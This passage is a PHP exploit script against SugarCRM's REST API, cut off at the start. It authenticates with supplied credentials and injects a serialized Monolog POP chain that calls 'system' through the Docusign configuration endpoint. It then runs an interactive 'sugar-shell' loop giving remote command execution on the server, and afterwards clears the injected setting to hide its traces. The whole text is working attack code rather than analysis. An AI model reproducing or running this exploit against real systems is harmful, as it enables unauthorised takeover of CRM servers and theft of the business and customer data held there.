\n"); include("chain.php"); function inject_pop_chain($cmd) { global $ch, $url; $pop = new \Monolog\Handler\BufferHandler(["current", "system"], [$cmd, "level" => null]); $pop = new \Monolog\Handler\SyslogUdpHandler($pop); $pop = base64_encode(serialize($pop)); curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign"); curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":"'.$pop.'"}'); curl_exec($ch); } list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]]; print "[+] Logging in with username '{$user}' and password '{$pass}'\n"; $ch = curl_init(); $params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"]; curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/oauth2/token"); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params)); curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n"); curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]); print "[+] Launching shell\n"; while(1) { print "\nsugar-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; inject_pop_chain($cmd); curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/DocuSign/getGlobalConfig"); curl_setopt($ch, CURLOPT_POST, false); preg_match("/(.+)/s", curl_exec($ch), $m) ? print $m[1] : die("\n[+] Exploit failed!\n"); } // cleaning curl_setopt($ch, CURLOPT_URL, "{$url}rest/v11_18/Administration/config/Docusign"); curl_setopt($ch, CURLOPT_POSTFIELDS, '{"Docusign_GlobalSettings":""}'); curl_exec($ch);